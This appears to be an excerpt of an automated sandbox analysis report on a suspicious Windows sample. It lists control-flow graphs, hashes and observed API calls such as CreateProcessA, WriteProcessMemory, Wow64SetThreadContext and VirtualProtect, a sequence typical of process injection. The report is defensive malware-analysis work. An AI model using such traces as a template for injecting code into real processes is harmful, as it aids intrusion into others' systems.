                                                                                                            • Source File: 00000000.00000002.2346286188.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1250000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 04c2bb834f8daba28be4776e34980a31a07a784736c924b6c80cd0bf6e1482b7
                                                                                                            • Instruction ID: d9bd5c60ed52aefcd4675c1494d5c6e3e259b90d8dd3894aae8ee7299ace54f5
                                                                                                            • Opcode Fuzzy Hash: 04c2bb834f8daba28be4776e34980a31a07a784736c924b6c80cd0bf6e1482b7
                                                                                                            • Instruction Fuzzy Hash: A85147B091074ACFEB54CFAAD588B9EFBF1BB88304F248459E509A73A0D7345944CB65
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366704895.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fb0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ry
                                                                                                            • API String ID: 0-657736063
                                                                                                            • Opcode ID: 9eb081219b24dec0c3cd03bd282673d3b59ed7be0b564bd3352709bb28e31d0d
                                                                                                            • Instruction ID: 02a968484d69ee7c40d0c9759c47423e1bd8f327133563517a77dd19c0098768
                                                                                                            • Opcode Fuzzy Hash: 9eb081219b24dec0c3cd03bd282673d3b59ed7be0b564bd3352709bb28e31d0d
                                                                                                            • Instruction Fuzzy Hash: BAC2C030E09349DFDB56CBA5C868BFEBFB5AF46300F14419AE501AB2A2C7385945CF61

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1034 50f3090-50f3091 1035 50f30c2-50f30f1 1034->1035 1036 50f3092-50f30b0 1034->1036 1038 50f30f3-50f3111 1035->1038 1039 50f3122-50f313e 1035->1039 1036->1036 1037 50f30b2-50f30be 1036->1037 1037->1035 1040 50f3113-50f311e 1038->1040 1041 50f3142-50f3179 1038->1041 1039->1041 1040->1039 1044 50f317b-50f3199 1041->1044 1045 50f31aa-50f31c8 1041->1045 1046 50f319b-50f31a9 1044->1046 1047 50f31ca-50f31ce 1044->1047 1045->1047 1046->1045 1050 50f31d8-50f31e5 1047->1050 1051 50f31d0 call 50f0ef0 1047->1051 1053 50f31e7-50f3214 1050->1053 1054 50f3216-50f3256 1050->1054 1055 50f31d5-50f31d6 1051->1055 1053->1054 1056 50f3258-50f325e 1054->1056 1057 50f3261-50f3268 1054->1057 1056->1057 1058 50f326a-50f3270 1057->1058 1059 50f3273-50f3312 CreateWindowExW 1057->1059 1058->1059 1061 50f331b-50f3353 1059->1061 1062 50f3314-50f331a 1059->1062 1066 50f3355-50f3358 1061->1066 1067 50f3360 1061->1067 1062->1061 1066->1067 1068 50f3361 1067->1068 1068->1068
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2359107215.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_50f0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da3bd28473ef01d1b2319c1df32c120017421632801816e518f3f6167949b662
                                                                                                            • Instruction ID: fcc51518e53a0f5105acc9effc8175cc782a20ab87e65c8a621693e51f4f8347
                                                                                                            • Opcode Fuzzy Hash: da3bd28473ef01d1b2319c1df32c120017421632801816e518f3f6167949b662
                                                                                                            • Instruction Fuzzy Hash: 289165B1809389EFCB52CFA5D8509DDBFF1BF0A320F1981AAE544AB222D3358855CF51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1378 682ec45-682ecc0 1381 682ecc2-682eccc 1378->1381 1382 682ecf9-682ed19 1378->1382 1381->1382 1383 682ecce-682ecd0 1381->1383 1387 682ed52-682ed8c 1382->1387 1388 682ed1b-682ed25 1382->1388 1385 682ecd2-682ecdc 1383->1385 1386 682ecf3-682ecf6 1383->1386 1389 682ece0-682ecef 1385->1389 1390 682ecde 1385->1390 1386->1382 1398 682edc5-682ee3a CreateProcessA 1387->1398 1399 682ed8e-682ed98 1387->1399 1388->1387 1391 682ed27-682ed29 1388->1391 1389->1389 1392 682ecf1 1389->1392 1390->1389 1393 682ed2b-682ed35 1391->1393 1394 682ed4c-682ed4f 1391->1394 1392->1386 1396 682ed37 1393->1396 1397 682ed39-682ed48 1393->1397 1394->1387 1396->1397 1397->1397 1400 682ed4a 1397->1400 1409 682ee43-682ee8b 1398->1409 1410 682ee3c-682ee42 1398->1410 1399->1398 1401 682ed9a-682ed9c 1399->1401 1400->1394 1402 682ed9e-682eda8 1401->1402 1403 682edbf-682edc2 1401->1403 1405 682edaa 1402->1405 1406 682edac-682edbb 1402->1406 1403->1398 1405->1406 1406->1406 1407 682edbd 1406->1407 1407->1403 1415 682ee9b-682ee9f 1409->1415 1416 682ee8d-682ee91 1409->1416 1410->1409 1418 682eea1-682eea5 1415->1418 1419 682eeaf-682eeb3 1415->1419 1416->1415 1417 682ee93 1416->1417 1417->1415 1418->1419 1420 682eea7 1418->1420 1421 682eec3 1419->1421 1422 682eeb5-682eeb9 1419->1422 1420->1419 1424 682eec4 1421->1424 1422->1421 1423 682eebb 1422->1423 1423->1421 1424->1424
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0682EE2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 017116997474e208a90d5751bf694dbb1b5b27a15ea2b13c5af2f064f1b62ee5
                                                                                                            • Instruction ID: c1d91046feaea8c214cccd0f488d60e854fb55d4cb2f3b11e6e6752a5c66fd0e
                                                                                                            • Opcode Fuzzy Hash: 017116997474e208a90d5751bf694dbb1b5b27a15ea2b13c5af2f064f1b62ee5
                                                                                                            • Instruction Fuzzy Hash: DA814771D1066A9FDB50CFA9C8867EEBBF1BF48310F148529E854E7280DB748881CF85

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1425 682ec50-682ecc0 1427 682ecc2-682eccc 1425->1427 1428 682ecf9-682ed19 1425->1428 1427->1428 1429 682ecce-682ecd0 1427->1429 1433 682ed52-682ed8c 1428->1433 1434 682ed1b-682ed25 1428->1434 1431 682ecd2-682ecdc 1429->1431 1432 682ecf3-682ecf6 1429->1432 1435 682ece0-682ecef 1431->1435 1436 682ecde 1431->1436 1432->1428 1444 682edc5-682ee3a CreateProcessA 1433->1444 1445 682ed8e-682ed98 1433->1445 1434->1433 1437 682ed27-682ed29 1434->1437 1435->1435 1438 682ecf1 1435->1438 1436->1435 1439 682ed2b-682ed35 1437->1439 1440 682ed4c-682ed4f 1437->1440 1438->1432 1442 682ed37 1439->1442 1443 682ed39-682ed48 1439->1443 1440->1433 1442->1443 1443->1443 1446 682ed4a 1443->1446 1455 682ee43-682ee8b 1444->1455 1456 682ee3c-682ee42 1444->1456 1445->1444 1447 682ed9a-682ed9c 1445->1447 1446->1440 1448 682ed9e-682eda8 1447->1448 1449 682edbf-682edc2 1447->1449 1451 682edaa 1448->1451 1452 682edac-682edbb 1448->1452 1449->1444 1451->1452 1452->1452 1453 682edbd 1452->1453 1453->1449 1461 682ee9b-682ee9f 1455->1461 1462 682ee8d-682ee91 1455->1462 1456->1455 1464 682eea1-682eea5 1461->1464 1465 682eeaf-682eeb3 1461->1465 1462->1461 1463 682ee93 1462->1463 1463->1461 1464->1465 1466 682eea7 1464->1466 1467 682eec3 1465->1467 1468 682eeb5-682eeb9 1465->1468 1466->1465 1470 682eec4 1467->1470 1468->1467 1469 682eebb 1468->1469 1469->1467 1470->1470
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0682EE2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 8975bafe3e39c6e5694adbb22f68d1a6bb9447e21a1d0a9d564728b4d740e355
                                                                                                            • Instruction ID: 0362e4d90c3a30f524785347da1de62c27b22254d90018d17ad7675e6bb026d0
                                                                                                            • Opcode Fuzzy Hash: 8975bafe3e39c6e5694adbb22f68d1a6bb9447e21a1d0a9d564728b4d740e355
                                                                                                            • Instruction Fuzzy Hash: 2F813771D1066A9FDB50CFA9C8857EEBBF1BF88310F148529E854E7280D7748881CF85

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1471 6824934-68249a1 1474 68249a3-68249ad 1471->1474 1475 68249da-68249fa 1471->1475 1474->1475 1476 68249af-68249b1 1474->1476 1480 6824a33-6824a95 CopyFileA 1475->1480 1481 68249fc-6824a06 1475->1481 1478 68249b3-68249bd 1476->1478 1479 68249d4-68249d7 1476->1479 1482 68249c1-68249d0 1478->1482 1483 68249bf 1478->1483 1479->1475 1493 6824a97-6824a9d 1480->1493 1494 6824a9e-6824ae6 1480->1494 1481->1480 1485 6824a08-6824a0a 1481->1485 1482->1482 1484 68249d2 1482->1484 1483->1482 1484->1479 1486 6824a0c-6824a16 1485->1486 1487 6824a2d-6824a30 1485->1487 1489 6824a1a-6824a29 1486->1489 1490 6824a18 1486->1490 1487->1480 1489->1489 1492 6824a2b 1489->1492 1490->1489 1492->1487 1493->1494 1499 6824af6-6824afa 1494->1499 1500 6824ae8-6824aec 1494->1500 1502 6824b0a 1499->1502 1503 6824afc-6824b00 1499->1503 1500->1499 1501 6824aee 1500->1501 1501->1499 1505 6824b0b 1502->1505 1503->1502 1504 6824b02 1503->1504 1504->1502 1505->1505
                                                                                                            APIs
                                                                                                            • CopyFileA.KERNEL32(?,?,?), ref: 06824A85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CopyFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1304948518-0
                                                                                                            • Opcode ID: d267726ef0ec6e6fb8adb479f37ce3fb89f81eb26364c6574282c4cdf6146fdc
                                                                                                            • Instruction ID: b5d8da14231ea46dd97a37e5d386acbb2fc508a3b37cd15e279087e74022f245
                                                                                                            • Opcode Fuzzy Hash: d267726ef0ec6e6fb8adb479f37ce3fb89f81eb26364c6574282c4cdf6146fdc
                                                                                                            • Instruction Fuzzy Hash: 65518870D0066A9FDB50CFA9C9827AEBBF1EF48310F148529E816F7280D7749881CBA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1506 6824940-68249a1 1508 68249a3-68249ad 1506->1508 1509 68249da-68249fa 1506->1509 1508->1509 1510 68249af-68249b1 1508->1510 1514 6824a33-6824a95 CopyFileA 1509->1514 1515 68249fc-6824a06 1509->1515 1512 68249b3-68249bd 1510->1512 1513 68249d4-68249d7 1510->1513 1516 68249c1-68249d0 1512->1516 1517 68249bf 1512->1517 1513->1509 1527 6824a97-6824a9d 1514->1527 1528 6824a9e-6824ae6 1514->1528 1515->1514 1519 6824a08-6824a0a 1515->1519 1516->1516 1518 68249d2 1516->1518 1517->1516 1518->1513 1520 6824a0c-6824a16 1519->1520 1521 6824a2d-6824a30 1519->1521 1523 6824a1a-6824a29 1520->1523 1524 6824a18 1520->1524 1521->1514 1523->1523 1526 6824a2b 1523->1526 1524->1523 1526->1521 1527->1528 1533 6824af6-6824afa 1528->1533 1534 6824ae8-6824aec 1528->1534 1536 6824b0a 1533->1536 1537 6824afc-6824b00 1533->1537 1534->1533 1535 6824aee 1534->1535 1535->1533 1539 6824b0b 1536->1539 1537->1536 1538 6824b02 1537->1538 1538->1536 1539->1539
                                                                                                            APIs
                                                                                                            • CopyFileA.KERNEL32(?,?,?), ref: 06824A85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CopyFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1304948518-0
                                                                                                            • Opcode ID: b39e2e15efb20d4358626df39c022489494aef32bf02059468d2ded14296535c
                                                                                                            • Instruction ID: 5c662c2aabb23d40884a4277fb7a801db53638b64fad4e83c0eb56e1fb646705
                                                                                                            • Opcode Fuzzy Hash: b39e2e15efb20d4358626df39c022489494aef32bf02059468d2ded14296535c
                                                                                                            • Instruction Fuzzy Hash: 99517870D0076A9FDB50CFA9C9827AEBBF1FF48310F148529E816E7280D7749881CBA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1540 50f31f0-50f3256 1541 50f3258-50f325e 1540->1541 1542 50f3261-50f3268 1540->1542 1541->1542 1543 50f326a-50f3270 1542->1543 1544 50f3273-50f32ab 1542->1544 1543->1544 1545 50f32b3-50f3312 CreateWindowExW 1544->1545 1546 50f331b-50f3353 1545->1546 1547 50f3314-50f331a 1545->1547 1551 50f3355-50f3358 1546->1551 1552 50f3360 1546->1552 1547->1546 1551->1552 1553 50f3361 1552->1553 1553->1553
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050F3302
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2359107215.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_50f0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 89e5ca8ee8154096c9c10e9dc2fb88352107d41242eb3a347f263296c66a73b0
                                                                                                            • Instruction ID: bc02b426534df8141b20516656d74a33edef0f79b61ea505868cac200a217905
                                                                                                            • Opcode Fuzzy Hash: 89e5ca8ee8154096c9c10e9dc2fb88352107d41242eb3a347f263296c66a73b0
                                                                                                            • Instruction Fuzzy Hash: F941ADB1D00349DFDB14CF9AD884ADEBBB5BF88310F24852AE919AB210D775A945CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1571 6fd6e00-6fd6e12 1572 6fd6e3c-6fd6e40 1571->1572 1573 6fd6e14-6fd6e35 1571->1573 1574 6fd6e4c-6fd6e5b 1572->1574 1575 6fd6e42-6fd6e44 1572->1575 1573->1572 1577 6fd6e5d 1574->1577 1578 6fd6e67-6fd6e93 1574->1578 1575->1574 1577->1578 1581 6fd6e99-6fd6e9f 1578->1581 1582 6fd70c0-6fd7107 1578->1582 1583 6fd6ea5-6fd6eab 1581->1583 1584 6fd6f71-6fd6f75 1581->1584 1613 6fd711d-6fd7129 1582->1613 1614 6fd7109 1582->1614 1583->1582 1586 6fd6eb1-6fd6ebe 1583->1586 1587 6fd6f98-6fd6fa1 1584->1587 1588 6fd6f77-6fd6f80 1584->1588 1590 6fd6ec4-6fd6ecd 1586->1590 1591 6fd6f50-6fd6f59 1586->1591 1593 6fd6fc6-6fd6fc9 1587->1593 1594 6fd6fa3-6fd6fc3 1587->1594 1588->1582 1592 6fd6f86-6fd6f96 1588->1592 1590->1582 1596 6fd6ed3-6fd6eeb 1590->1596 1591->1582 1595 6fd6f5f-6fd6f6b 1591->1595 1597 6fd6fcc-6fd6fd2 1592->1597 1593->1597 1594->1593 1595->1583 1595->1584 1599 6fd6eed 1596->1599 1600 6fd6ef7-6fd6f09 1596->1600 1597->1582 1602 6fd6fd8-6fd6feb 1597->1602 1599->1600 1600->1591 1609 6fd6f0b-6fd6f11 1600->1609 1602->1582 1604 6fd6ff1-6fd7001 1602->1604 1604->1582 1607 6fd7007-6fd7014 1604->1607 1607->1582 1608 6fd701a-6fd702f 1607->1608 1608->1582 1622 6fd7035-6fd7058 1608->1622 1611 6fd6f1d-6fd6f23 1609->1611 1612 6fd6f13 1609->1612 1611->1582 1619 6fd6f29-6fd6f4d 1611->1619 1612->1611 1617 6fd712b 1613->1617 1618 6fd7135-6fd7151 1613->1618 1615 6fd710c-6fd710e 1614->1615 1620 6fd7110-6fd711b 1615->1620 1621 6fd7152-6fd7158 1615->1621 1617->1618 1620->1613 1620->1615 1629 6fd717c-6fd717f 1621->1629 1630 6fd715a-6fd7178 call 6fd2660 1621->1630 1622->1582 1627 6fd705a-6fd7065 1622->1627 1633 6fd7067-6fd7071 1627->1633 1634 6fd70b6-6fd70bd 1627->1634 1631 6fd7197-6fd7199 1629->1631 1632 6fd7181-6fd7187 1629->1632 1630->1629 1658 6fd719b call 6fd7218 1631->1658 1659 6fd719b call 6fd8020 1631->1659 1660 6fd719b call 6fd7fd0 1631->1660 1636 6fd7189 1632->1636 1637 6fd718b-6fd718d 1632->1637 1633->1634 1642 6fd7073-6fd7089 1633->1642 1636->1631 1637->1631 1638 6fd71a1-6fd71a5 1640 6fd71a7-6fd71be 1638->1640 1641 6fd71f0-6fd71f5 1638->1641 1640->1641 1650 6fd71c0-6fd71ca 1640->1650 1644 6fd71fd-6fd7200 1641->1644 1646 6fd708b 1642->1646 1647 6fd7095-6fd70ae 1642->1647 1646->1647 1647->1634 1653 6fd71dd-6fd71ed 1650->1653 1654 6fd71cc-6fd71db 1650->1654 1654->1653 1658->1638 1659->1638 1660->1638
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: d
                                                                                                            • API String ID: 0-2564639436
                                                                                                            • Opcode ID: e991d3a598d57d84439ff8c1989120477d815b72a00483075ca6c171cc9725f3
                                                                                                            • Instruction ID: c66d29237a2007e2331f449ae7fd07eff4b108698de217fb3f159b1d0fb00910
                                                                                                            • Opcode Fuzzy Hash: e991d3a598d57d84439ff8c1989120477d815b72a00483075ca6c171cc9725f3
                                                                                                            • Instruction Fuzzy Hash: 97D16C35A00606CFCB14DF28C894A6AB7F3FF88310B59C969D55A9B3A1DB31F845CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1554 50f1044-50f597c 1557 50f5a2c-50f5a4c call 50f0f1c 1554->1557 1558 50f5982-50f5987 1554->1558 1566 50f5a4f-50f5a5c 1557->1566 1559 50f59da-50f5a12 CallWindowProcW 1558->1559 1560 50f5989-50f59c0 1558->1560 1562 50f5a1b-50f5a2a 1559->1562 1563 50f5a14-50f5a1a 1559->1563 1567 50f59c9-50f59d8 1560->1567 1568 50f59c2-50f59c8 1560->1568 1562->1566 1563->1562 1567->1566 1568->1567
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 050F5A01
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2359107215.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_50f0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 1de13c86e71c585fe5066ba8d2c60a15c8819ca1e5ff6bb39d1a5c2306d19054
                                                                                                            • Instruction ID: f7ee9c001842c6712ad7fd5b6e1239ade22aa01dc88a7e5299714e853df9dd06
                                                                                                            • Opcode Fuzzy Hash: 1de13c86e71c585fe5066ba8d2c60a15c8819ca1e5ff6bb39d1a5c2306d19054
                                                                                                            • Instruction Fuzzy Hash: 5B4127B4900309DFDB14CF99D888AAEBBF5FB89314F24C459E519AB721D774A841CFA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1661 682fcb1-682fd06 1664 682fd16-682fd55 WriteProcessMemory 1661->1664 1665 682fd08-682fd14 1661->1665 1667 682fd57-682fd5d 1664->1667 1668 682fd5e-682fd8e 1664->1668 1665->1664 1667->1668
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0682FD48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: ca21bd482cb3a79f1463ff4b93d05fdb972df3fa658655db16038d56bb6b48bc
                                                                                                            • Instruction ID: db8a62862b9ecf56d91d8f407837f4e072d89dd51b168b1d5f8563931d87ec64
                                                                                                            • Opcode Fuzzy Hash: ca21bd482cb3a79f1463ff4b93d05fdb972df3fa658655db16038d56bb6b48bc
                                                                                                            • Instruction Fuzzy Hash: CC2148759003599FDB10CFA9C981BDEBBF5FF48310F108429EA19A7240C7789544CBA4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1672 682fcb8-682fd06 1674 682fd16-682fd55 WriteProcessMemory 1672->1674 1675 682fd08-682fd14 1672->1675 1677 682fd57-682fd5d 1674->1677 1678 682fd5e-682fd8e 1674->1678 1675->1674 1677->1678
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0682FD48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: fbf3534c65afe2acf435b06292717c5b85e9fdf3e6de9471b940bb61a6f64850
                                                                                                            • Instruction ID: 2197389839436ffeb877d9a85e190586e848d8398cb1c1bad085dd4cd5c36135
                                                                                                            • Opcode Fuzzy Hash: fbf3534c65afe2acf435b06292717c5b85e9fdf3e6de9471b940bb61a6f64850
                                                                                                            • Instruction Fuzzy Hash: 9C2126719003599FDB10CFA9C981BDEBBF5FF48310F108429EA18A7240C7789954CBA4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1702 714a869-714a8f1 VirtualProtect 1706 714a8f3-714a8f9 1702->1706 1707 714a8fa-714a92a 1702->1707 1706->1707
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0714A8E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 5a75cdf4559e7d633c799c11513e8fc851307ca07723f55d952075ee4fe19993
                                                                                                            • Instruction ID: 4bd1131af290f1751ff9c6ed9231189aa6a48a52d05a9d55ebdee803d1fc9c38
                                                                                                            • Opcode Fuzzy Hash: 5a75cdf4559e7d633c799c11513e8fc851307ca07723f55d952075ee4fe19993
                                                                                                            • Instruction Fuzzy Hash: DE21397180034A9FDB10DFAAC441BEEBBF4EF88220F148429D519A7240C7399541CBA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1691 682f409-682f45b 1694 682f46b-682f49b Wow64SetThreadContext 1691->1694 1695 682f45d-682f469 1691->1695 1697 682f4a4-682f4d4 1694->1697 1698 682f49d-682f4a3 1694->1698 1695->1694 1698->1697
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0682F48E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: b306e3c75cb06d4c1c7acb7b5041bd3cd0a15381809983de260d8ada5dbc2abc
                                                                                                            • Instruction ID: 69ed6f9b4a8c327d7f2978204df9534d98daa778f732704b1a15546b4d9a9d58
                                                                                                            • Opcode Fuzzy Hash: b306e3c75cb06d4c1c7acb7b5041bd3cd0a15381809983de260d8ada5dbc2abc
                                                                                                            • Instruction Fuzzy Hash: F0213871D003499FDB10CFAAC5857EEBBF4EF88324F14842AD559A7241CB789944CFA5
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0682F48E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: a05874207cc80bd1d81ef0533820b5527959e99bf15234be728de8d2b8594b55
                                                                                                            • Instruction ID: 2bc06c3b8e3ec83b3c5e95596aad57eb54b0f3237fd836d7625ef9e2299072f6
                                                                                                            • Opcode Fuzzy Hash: a05874207cc80bd1d81ef0533820b5527959e99bf15234be728de8d2b8594b55
                                                                                                            • Instruction Fuzzy Hash: B5215871D003098FDB10CFAAC585BEEBBF4EF88324F14842AD519A7240CB78A944CFA5
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0125F0B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2346286188.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1250000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 948a1ff1b8afe8f1636428f49f29d9d2b4fba7173257f6ffb0ed8f3407085da0
                                                                                                            • Instruction ID: 50da26498c6d53eb606556e5449c50902feaf8bf5d33e99c4b7c660fd6df6995
                                                                                                            • Opcode Fuzzy Hash: 948a1ff1b8afe8f1636428f49f29d9d2b4fba7173257f6ffb0ed8f3407085da0
                                                                                                            • Instruction Fuzzy Hash: 3621E4B5900249DFDB10CFAAD984ADEFFF8EB48310F14801AE914A3310D378A954CFA5
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F70EB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: dc75d541ebc23f05be830c968aafc75edbbc450b37a27fe51a100589b9dccda6
